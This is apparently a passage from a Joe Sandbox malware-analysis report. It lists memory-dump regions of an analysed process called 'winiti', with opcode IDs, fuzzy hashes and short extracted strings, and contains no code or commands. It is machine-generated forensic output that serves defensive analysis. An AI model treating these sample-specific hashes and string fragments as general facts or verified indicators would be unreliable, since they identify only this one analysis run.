                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9de6b46d4fe362215a662baf700a21984ee58055f0a66fa27b9ca1d0544cc569
                                                              • Instruction ID: 180ea189e0839195895312efbf5afd4a542ad01719a6871be81880c1f4e0627c
                                                              • Opcode Fuzzy Hash: 9de6b46d4fe362215a662baf700a21984ee58055f0a66fa27b9ca1d0544cc569
                                                              • Instruction Fuzzy Hash: A7917C71E1020A9FDF10CFA9C8857EDBBF2AF88314F14812AD445AB394EB749D55CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-3402276426
                                                              • Opcode ID: fcf198b85a2548d06aa247df4d157acf933d3ab6f1406b3c7f87c7c7a69c7503
                                                              • Instruction ID: b17e48774a3735febe2ff477fa1e162edcdad2293c5b2ef062af7a159d56572c
                                                              • Opcode Fuzzy Hash: fcf198b85a2548d06aa247df4d157acf933d3ab6f1406b3c7f87c7c7a69c7503
                                                              • Instruction Fuzzy Hash: F1029F30A006158FDB24DFA8E584BADB7B2FF84310F64892AE415DB355DB39DD85CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-3402276426
                                                              • Opcode ID: 50727115d94b1bfa98f283f5c59562c36880b4b6685c500b8aac4e5379450f8a
                                                              • Instruction ID: 722e20bec47a331a57bd6de4b791af0cc62c3dd260f4384b5dea0e3820beb79a
                                                              • Opcode Fuzzy Hash: 50727115d94b1bfa98f283f5c59562c36880b4b6685c500b8aac4e5379450f8a
                                                              • Instruction Fuzzy Hash: EAF12970A11214CFCB19EFA4E494B6EBBB2FF94300F648569D8459B359DB35ED82CB80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DJs$Tep$Tep$Gs
                                                              • API String ID: 0-1132754292
                                                              • Opcode ID: 9f7cd497a50b492adbdf6f002273183fd699fc621456b8b48e3143d13bfacd5f
                                                              • Instruction ID: d6a62a28c93d190cff70fcbb00badc8edb9d468657e66f79a7ec09643e0f2fe1
                                                              • Opcode Fuzzy Hash: 9f7cd497a50b492adbdf6f002273183fd699fc621456b8b48e3143d13bfacd5f
                                                              • Instruction Fuzzy Hash: 1DE17E75A003288FDB25DB68D490BADB7B2FF99300F248929E40AEB355DB35DD42DB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p
                                                              • API String ID: 0-3121760203
                                                              • Opcode ID: 7fc657913a152e714acd26140eef15fabb476da32bd67fff4be55468de2c03ac
                                                              • Instruction ID: 5db2b87da9b2ac1981ca44fa3c59657f0ef5d5f56dfdd834585808cdc8bfc5e8
                                                              • Opcode Fuzzy Hash: 7fc657913a152e714acd26140eef15fabb476da32bd67fff4be55468de2c03ac
                                                              • Instruction Fuzzy Hash: 91915E74B0021A8BDB54DF74E894BAE77F6AF84300F508469D809AB344EF78DE45CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p
                                                              • API String ID: 0-4193490398
                                                              • Opcode ID: c20d849fdb4286f854b7a9c750da88d41ceb7a538a2437b49b98946d0a8c1f41
                                                              • Instruction ID: 9e64e63b6c9c435e13babeb377c40b8ef0bf094894f8648554b87cc14d7c5bb2
                                                              • Opcode Fuzzy Hash: c20d849fdb4286f854b7a9c750da88d41ceb7a538a2437b49b98946d0a8c1f41
                                                              • Instruction Fuzzy Hash: 61625D30A00356CFCB1AEB68E585A5DB7B2FF84300BA4C968D0099F359DB75ED46CB84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRp
                                                              • API String ID: 0-3405495957
                                                              • Opcode ID: 3059ff5fd2ddc638629558ed78b0e8a8760fd585858429ff789b89c4414209e5
                                                              • Instruction ID: ad61a5701fa8e965f9b04c736765a8860f0d0d71b434e0759790e5e661ea73f4
                                                              • Opcode Fuzzy Hash: 3059ff5fd2ddc638629558ed78b0e8a8760fd585858429ff789b89c4414209e5
                                                              • Instruction Fuzzy Hash: 02918034B206268FCB14DF68C498B6E77B2EF89310F24446AE406DB3A5DBB4DC55CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHp
                                                              • API String ID: 0-2495607638
                                                              • Opcode ID: e905bf57b55fd1022f4fcf03f7d937dc2ad0c4dd54e57ea167830b5764aa2c8a
                                                              • Instruction ID: e4ccf322ecd91989807ea1695888ac02a24e6732d58a9a78ed3d54c5d1ec2cc5
                                                              • Opcode Fuzzy Hash: e905bf57b55fd1022f4fcf03f7d937dc2ad0c4dd54e57ea167830b5764aa2c8a
                                                              • Instruction Fuzzy Hash: 9951F331B00325AFDB159A78A8547AE77B7EBC4320F24852AD00ADB384DF38CD4287D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dChg
                                                              • API String ID: 0-2569968005
                                                              • Opcode ID: 5ddf81590e7a92b3af5738f627efac3e4f4eb0fbcd33c0064314fb6f58302cf6
                                                              • Instruction ID: f6459730e78e5d1d2dd7c54d41a28872b39c0a0cad9c30d0339d73ccacbcface
                                                              • Opcode Fuzzy Hash: 5ddf81590e7a92b3af5738f627efac3e4f4eb0fbcd33c0064314fb6f58302cf6
                                                              • Instruction Fuzzy Hash: 0151E031B00219DFDB25EB78F8596ADB7B2FF98311F108869D10AE7290DB399D45CB80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRp
                                                              • API String ID: 0-3405495957
                                                              • Opcode ID: ce35635bc6f4d0821a8889ef17e2ff5a1ad15bd77511b8da883848b8be298582
                                                              • Instruction ID: 8ecd7876f63f8a28ecedf072f739e7151662448ea55d8bd148e00deee3571a71
                                                              • Opcode Fuzzy Hash: ce35635bc6f4d0821a8889ef17e2ff5a1ad15bd77511b8da883848b8be298582
                                                              • Instruction Fuzzy Hash: 3D410130B10A228FDF24DE78C88076E77B2EF85311F24886AE41ADB394DA74DC958790
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHp
                                                              • API String ID: 0-2495607638
                                                              • Opcode ID: 642e6ab8370606023b5c4d7ea5874bcc7b8a3bc2afa78c1fe82a767cab0e754e
                                                              • Instruction ID: 5d9ee08e42b8ce4ed906e09331a863d3cf9e7dad9861239b2c4c60b15ac0cf2b
                                                              • Opcode Fuzzy Hash: 642e6ab8370606023b5c4d7ea5874bcc7b8a3bc2afa78c1fe82a767cab0e754e
                                                              • Instruction Fuzzy Hash: 5F41BD70B003158FDB16AB74E9557AE7BA3FB98310B248528D406DB396DF35CD06CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHp
                                                              • API String ID: 0-2495607638
                                                              • Opcode ID: dfd2e6b934140c3a54b5e03def77cfeba6eeea92e940d9a4d209e3fd9f61967b
                                                              • Instruction ID: 1cf6ca62573f99569496b83b83ed412acfd917d78773ada828267ec175b5622f
                                                              • Opcode Fuzzy Hash: dfd2e6b934140c3a54b5e03def77cfeba6eeea92e940d9a4d209e3fd9f61967b
                                                              • Instruction Fuzzy Hash: CF41AF70A0435ADFDB25CF74E9857AEBBB2FF85300F248529E405DB240DB39A946CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHp
                                                              • API String ID: 0-2495607638
                                                              • Opcode ID: 11a8409e6c35ac77cae82490fa3c0a81c5936f0f2d992406a34e56b8af534f09
                                                              • Instruction ID: e2138e10f7fd77adbb5adeba514f67db80c8afdfdeaee686a14f3e554904c0bf
                                                              • Opcode Fuzzy Hash: 11a8409e6c35ac77cae82490fa3c0a81c5936f0f2d992406a34e56b8af534f09
                                                              • Instruction Fuzzy Hash: C341D330B003028FCF55AF34E85976E3BA2AF89354B65896AD406CF395EE35CD06C795
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRp
                                                              • API String ID: 0-3405495957
                                                              • Opcode ID: 38c0c6771250e3ee49aca7e63a8b687489168fa406a99bea09b33ea1e36fb7ea
                                                              • Instruction ID: cbd928ce303b725fd8ed99630f2be732d5c119ca034ea5a1e52910200e2fdff6
                                                              • Opcode Fuzzy Hash: 38c0c6771250e3ee49aca7e63a8b687489168fa406a99bea09b33ea1e36fb7ea
                                                              • Instruction Fuzzy Hash: 09314F70E2072A9BDB14CFA4D8447AEB7B2EF85311F60852BE406EB394D7B09D91CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p
                                                              • API String ID: 0-982128392
                                                              • Opcode ID: 8c6259c6aa7c414a486857302dac83d7b3e461f5ab208eeeadc880a674907c87
                                                              • Instruction ID: 189a13f6c84e6f977dc73e2d1d23cdcb8d0ff74e41bbd574959fd8a661a550a8
                                                              • Opcode Fuzzy Hash: 8c6259c6aa7c414a486857302dac83d7b3e461f5ab208eeeadc880a674907c87
                                                              • Instruction Fuzzy Hash: D9017B327043A0AFCF25AD61FD942A67B25EB90310F14407ACC02C3286DB78DE13C791
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5dfbb00a8d23f3d76ef43d676823724970423e0fd58bb15ff8aea67d90f731d3
                                                              • Instruction ID: b4b4c4bb2584e771dc9c1d2445eb5bf9e21ccfb5a9e614290bbceee48c375c62
                                                              • Opcode Fuzzy Hash: 5dfbb00a8d23f3d76ef43d676823724970423e0fd58bb15ff8aea67d90f731d3
                                                              • Instruction Fuzzy Hash: 0C924734A10205CFDB64EF68C588AADB7F2EF49314F55886AD41AAF361DB35EC45CB40
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53bfe0a2e978b8053cdff76b10f8db09da024ddf135c7099a5fa9d5f3d05d4c1
                                                              • Instruction ID: a42ed086d542f1f513fcc705dfb8d0f826c15c98c46b7c439bc5919d8a5b8f57
                                                              • Opcode Fuzzy Hash: 53bfe0a2e978b8053cdff76b10f8db09da024ddf135c7099a5fa9d5f3d05d4c1
                                                              • Instruction Fuzzy Hash: 99226B71710306DBDB16AB28E45926C37A2FBC5354B608C3AE045CB35ACF39EC869BD5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3b2723d82187f15cc2bb299225e0774cf0bf1c6d4fcedae562f9bca624473c8
                                                              • Instruction ID: 76124c58d057def3534e4fab965ebaa008734396a68a9ab998da12da59438f9f
                                                              • Opcode Fuzzy Hash: d3b2723d82187f15cc2bb299225e0774cf0bf1c6d4fcedae562f9bca624473c8
                                                              • Instruction Fuzzy Hash: 26F1C034B1020A8FDB15DF68D894AADBBB2EF88310F64846AE405DB395DF34DD56CB81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7c5989ccb56cabde7d7302fb373492e60f03372582e4d078a97775c6927c8c3
                                                              • Instruction ID: aeed9d69a7055eb5ec586386b78683eee52b4d9e5d5417326b749d00a2657648
                                                              • Opcode Fuzzy Hash: b7c5989ccb56cabde7d7302fb373492e60f03372582e4d078a97775c6927c8c3
                                                              • Instruction Fuzzy Hash: 99C16D34B0021A9FDB25EFA8E8946AEB7B2FF85310F108829D406D7754EB39DD468B51
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d39caa3c516ba7d27fa98111efe3d776c83220e22d86f37a463c39d83c3992d5
                                                              • Instruction ID: 42ef44fe22a38ffc4c266cb8cb76e7e93d01ecb3df75e79906d9216526addb71
                                                              • Opcode Fuzzy Hash: d39caa3c516ba7d27fa98111efe3d776c83220e22d86f37a463c39d83c3992d5
                                                              • Instruction Fuzzy Hash: ECB1B331A00329AFDF21DBA4D881BAEB772FF85310F118569E549DB240D778DD858B92
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3800df746f40dd230af61c96c29d9788acf49bec6950fedae6a375555d08b62
                                                              • Instruction ID: 586863d421b4fc1b60eceff0d52d4d59fc3448c6ae6b381ddd14b09a1b267b5a
                                                              • Opcode Fuzzy Hash: e3800df746f40dd230af61c96c29d9788acf49bec6950fedae6a375555d08b62
                                                              • Instruction Fuzzy Hash: 58A1D631B00215AFDB24DF69D880B6EB7B2FF95320F21856AE159DB291D634EC81C792
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01eeeefa938063f44ae0d2689ff14f2cbda53011bbfc99b953f82cffb7a0d48a
                                                              • Instruction ID: 52b3d2848fa170dea5353529c3762283f927882b29dff17d90f3c3c576098cb3
                                                              • Opcode Fuzzy Hash: 01eeeefa938063f44ae0d2689ff14f2cbda53011bbfc99b953f82cffb7a0d48a
                                                              • Instruction Fuzzy Hash: 9AB19C70E1020A8FDB10DFA8D88579DBBF6AF49354F24812AD815EB394EB74DC55CB81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3151acc8e43a77413d2be98adcfc33d2101fd2647a5cb4d6d56ae0ea9756a6c1
                                                              • Instruction ID: 7b95fd960ab9419a6f62d95f794c37bbcd95b5a02a269ca44d2cdb6a3b49e0b5
                                                              • Opcode Fuzzy Hash: 3151acc8e43a77413d2be98adcfc33d2101fd2647a5cb4d6d56ae0ea9756a6c1
                                                              • Instruction Fuzzy Hash: 48A16B30A00214DFCB14EB68E588B6DB7F2FF94314F948869E41AAB755DB39ED45CB80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8a57a7843901e47ebee07cdf285eed952e30f2c2e99d3947e8340c9b6608f8e
                                                              • Instruction ID: cd11fc42fb8354447b66a70cb2b00b4f65900623f3f58bc6c174a8854cb49d00
                                                              • Opcode Fuzzy Hash: c8a57a7843901e47ebee07cdf285eed952e30f2c2e99d3947e8340c9b6608f8e
                                                              • Instruction Fuzzy Hash: 1D917C70E1420A9FDF10CFA8C8857DDBBF1AF48304F14812AD445AB394EB749E56CB92
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8307bc784f60b4f31574ada003d113226b23b0332b2d38d7a52536ddfd363f53
                                                              • Instruction ID: 377573bfeb8b9406cce508be9e10166b04c25b5312bd2812344a61b6b85396e3
                                                              • Opcode Fuzzy Hash: 8307bc784f60b4f31574ada003d113226b23b0332b2d38d7a52536ddfd363f53
                                                              • Instruction Fuzzy Hash: 56817CB1A102058FDB14DF68D884B9DBBB2FF88314F14C16AE909DB395EB719C45CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dda2b4820bba9a9337248d166664561eb46f7dffc119771490ca24ecf254a1e3
                                                              • Instruction ID: 46796b4b00cfc1dd01542e942b949a3f05f043073b7528e02646a21958bf6974
                                                              • Opcode Fuzzy Hash: dda2b4820bba9a9337248d166664561eb46f7dffc119771490ca24ecf254a1e3
                                                              • Instruction Fuzzy Hash: DE813A30A002199FCB14DBA9E985AAEB7F6EF84300F24C429E509AB355DB35ED46CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a066e7960def91e69928870da6111cb45d6b7a6f31fefa39586a004014657fd8
                                                              • Instruction ID: 71ae072c269c57fb3f1528e7b19cf05a505bb96b86eb17ff9c951dea9536bbf1
                                                              • Opcode Fuzzy Hash: a066e7960def91e69928870da6111cb45d6b7a6f31fefa39586a004014657fd8
                                                              • Instruction Fuzzy Hash: 55714C30A002599FDB14DBA9E984A9EBBF6EF84300F64C429E509EB355DB34ED46CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c3a2875bbbc7eb3046428f008ec6d113e8dcd3f4a68f42d9c9ad27d85210f41
                                                              • Instruction ID: e3372774f089202025266749b089d5dbd98507ae391d74a5981d6212f92648f9
                                                              • Opcode Fuzzy Hash: 1c3a2875bbbc7eb3046428f008ec6d113e8dcd3f4a68f42d9c9ad27d85210f41
                                                              • Instruction Fuzzy Hash: 08813870601254CFDB18EF69E594BAEB7B2BF94300F648529E4459B399CB35ED82CF80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 965c74f3ed02dbdb198ee3ac6766fc9f2f852483268c89a02344bce8b7b28eaa
                                                              • Instruction ID: 59adbae01f67a1092341ee6296e728c67a572d574fcd204abac84bc892fff96c
                                                              • Opcode Fuzzy Hash: 965c74f3ed02dbdb198ee3ac6766fc9f2f852483268c89a02344bce8b7b28eaa
                                                              • Instruction Fuzzy Hash: B9814A30A002199FCB15EBA4D494AAEB7F2FF84300F25C529D5169B395EB35ED86CB80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66701182ea98849a9d8177bfa6e3b0a1f6ff041fe7db5191091616c2ff785da1
                                                              • Instruction ID: 94c361f918f28ee2323f1e3b199da014028a4e883cc394b2ed2e421427576f1d
                                                              • Opcode Fuzzy Hash: 66701182ea98849a9d8177bfa6e3b0a1f6ff041fe7db5191091616c2ff785da1
                                                              • Instruction Fuzzy Hash: A2715C30A002199FCB15EFA4D494AAEB7F2FF84300F25C529D5169B395EB35ED86CB80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cd25c1d5d3c92d99889b7b633f205bf0a325fca51c486d82eaab6e4c2277e49
                                                              • Instruction ID: bb81ec760226b18dd8d0c5ecdca34c2ea61752de932a4c31d76c48c314fc5e58
                                                              • Opcode Fuzzy Hash: 3cd25c1d5d3c92d99889b7b633f205bf0a325fca51c486d82eaab6e4c2277e49
                                                              • Instruction Fuzzy Hash: 3D61046161E3C16FDB136739A8642893F719F53314F4A00EBD081CFAB3E5198DA9C3A6
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c96b4fe03f3a214528a79b66f23ea790ce066122636b9409ffcbebc1766a875
                                                              • Instruction ID: 0c8018ede64b811a07614be4d396b20fcad48408dca65f716399a135b45ad99e
                                                              • Opcode Fuzzy Hash: 4c96b4fe03f3a214528a79b66f23ea790ce066122636b9409ffcbebc1766a875
                                                              • Instruction Fuzzy Hash: F8715B70E1024A9FDF14DFA9C88579EBBF2BF88314F24812AE414AB354DB749C95CB91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 651becef1f0b4f238ed8a3a1b9ae453cada582b731d821eae7d35c18b792a740
                                                              • Instruction ID: b617daab00ee8950361cc9fb5df17f564ea8e2072e346934fde050c764077025
                                                              • Opcode Fuzzy Hash: 651becef1f0b4f238ed8a3a1b9ae453cada582b731d821eae7d35c18b792a740
                                                              • Instruction Fuzzy Hash: 3751BF34B00325DBDB16EB64E4946BEBBB2FFD8300B508929E40697355DF38ED468B91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff2685691ebd912a2d0d888e183d70b76f25ededcecb54622f790e391d11356c
                                                              • Instruction ID: abf8ae3d00ca8566b7c977e189f08a428ea5d39ff537c0bab23f6368239c6bd7
                                                              • Opcode Fuzzy Hash: ff2685691ebd912a2d0d888e183d70b76f25ededcecb54622f790e391d11356c
                                                              • Instruction Fuzzy Hash: 93518F71A002289FCB21CFA9D444B9EBBB5EF88310F14852AE909EB345D738DD05CB91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc2ac6f56d485b102c19a7d12521e918eefb990a0d23b35e6e9d018996c0d2b9
                                                              • Instruction ID: b8d2135716a6b56c85a602119b72907e5fbef07bc4ac67b4a0bb3c2faa65fabd
                                                              • Opcode Fuzzy Hash: dc2ac6f56d485b102c19a7d12521e918eefb990a0d23b35e6e9d018996c0d2b9
                                                              • Instruction Fuzzy Hash: B451FA347002204FEF26666CE494B7F365AD7A9710F24993AE40AD7789CE7DCD418BE2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1298abcab80a18e1c913db093b3c9d2d23af9f9142fcde2ada4d46b7528aab32
